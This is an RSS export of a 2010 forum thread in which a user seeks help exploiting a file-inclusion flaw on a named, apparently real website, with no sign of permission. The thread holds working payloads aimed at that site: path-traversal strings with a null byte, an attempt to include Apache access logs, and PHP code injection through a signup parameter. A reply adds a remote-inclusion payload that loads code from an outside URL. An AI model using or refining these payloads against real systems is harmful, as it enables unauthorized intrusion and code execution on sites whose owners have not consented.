<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0" xmlns:dc="http://purl.org/dc/elements/1.1/">
    <channel>
        <title>Help with LFI</title>
        <description>I dont know why i always get the hard ones
hxxp://www.worldofarmaggedon.com/main/help/index.php?topic='

if i put 2 sets of ../ together it causes a 406
ive tried data and other items suggested before

thanks in advance</description>
        <link>http://sla.ckers.org/forum/read.php?2,33516,33516#msg-33516</link>
        <lastBuildDate>Wed, 22 May 2013 01:04:06 -0500</lastBuildDate>
        <generator>Phorum 5.2.15a</generator>
        <item>
            <guid>http://sla.ckers.org/forum/read.php?2,33516,33679#msg-33679</guid>
            <title>Re: Help with LFI</title>
            <link>http://sla.ckers.org/forum/read.php?2,33516,33679#msg-33679</link>
            <description><![CDATA[URLs are disabled<br />
:(]]></description>
            <dc:creator>RonPaul</dc:creator>
            <category>XSS Info</category>
            <pubDate>Tue, 02 Mar 2010 17:09:44 -0600</pubDate>
        </item>
        <item>
            <guid>http://sla.ckers.org/forum/read.php?2,33516,33660#msg-33660</guid>
            <title>Re: Help with LFI</title>
            <link>http://sla.ckers.org/forum/read.php?2,33516,33660#msg-33660</link>
            <description><![CDATA[your XSS payload will reflect in your browser, but not when PHP is parsing the script. if you want to use XSS with LFI, you need to use a URL with your XSS payload as LFI payload:<br />
<br />
/main/help/index.php?topic=http://url/index.php?account='&quot;&gt;&lt;?phpinfo();?&gt;<br />
<br />
http://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/]]></description>
            <dc:creator>Reiners</dc:creator>
            <category>XSS Info</category>
            <pubDate>Tue, 02 Mar 2010 10:37:21 -0600</pubDate>
        </item>
        <item>
            <guid>http://sla.ckers.org/forum/read.php?2,33516,33646#msg-33646</guid>
            <title>Re: Help with LFI</title>
            <link>http://sla.ckers.org/forum/read.php?2,33516,33646#msg-33646</link>
            <description><![CDATA[sorry just realized i posted in the wrong section<br />
thanks lightos, but it seems like i cant include anything useful like access/error/ logs or /proc. and i cant upload an image shell like as an avatar<br />
<br />
so i found XSS on signup.php<br />
and have been trying to do this<br />
hxxp://www.worldofarmaggedon.com/main/help/index.php?signup=&amp;account='&quot;&gt;&lt;?phpinfo();?&gt;&amp;topic=.././.././signup<br />
<br />
but all i get is the &lt;?phpinfo();&quot;&gt; in the html<br />
<br />
any more help would be great, thx<br />
<br />
hxxp://www.worldofarmaggedon.com/main/help/index.php?topic=.././.././.././.././apache/logs/access.log%00<br />
gives me open_basedir restriction in effect]]></description>
            <dc:creator>RonPaul</dc:creator>
            <category>XSS Info</category>
            <pubDate>Mon, 01 Mar 2010 19:37:05 -0600</pubDate>
        </item>
        <item>
            <guid>http://sla.ckers.org/forum/read.php?2,33516,33524#msg-33524</guid>
            <title>Re: Help with LFI</title>
            <link>http://sla.ckers.org/forum/read.php?2,33516,33524#msg-33524</link>
            <description><![CDATA[topic=.././.././index]]></description>
            <dc:creator>lightos</dc:creator>
            <category>XSS Info</category>
            <pubDate>Fri, 19 Feb 2010 11:32:13 -0600</pubDate>
        </item>
        <item>
            <guid>http://sla.ckers.org/forum/read.php?2,33516,33516#msg-33516</guid>
            <title>Help with LFI</title>
            <link>http://sla.ckers.org/forum/read.php?2,33516,33516#msg-33516</link>
            <description><![CDATA[I dont know why i always get the hard ones<br />
hxxp://www.worldofarmaggedon.com/main/help/index.php?topic='<br />
<br />
if i put 2 sets of ../ together it causes a 406<br />
ive tried data and other items suggested before<br />
<br />
thanks in advance]]></description>
            <dc:creator>RonPaul</dc:creator>
            <category>XSS Info</category>
            <pubDate>Thu, 18 Feb 2010 17:14:31 -0600</pubDate>
        </item>
    </channel>
</rss>
